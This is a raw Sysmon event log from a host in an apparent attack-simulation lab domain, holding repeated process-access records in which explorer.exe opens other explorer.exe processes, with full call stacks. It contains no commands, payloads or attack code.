16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246406Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246405Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246404Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246403Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246402Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246401Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246400Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246399Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246398Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246397Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246396Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246395Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246394Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246393Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246392Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246391Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246390Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246389Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246388Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246387Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.749{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246386Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 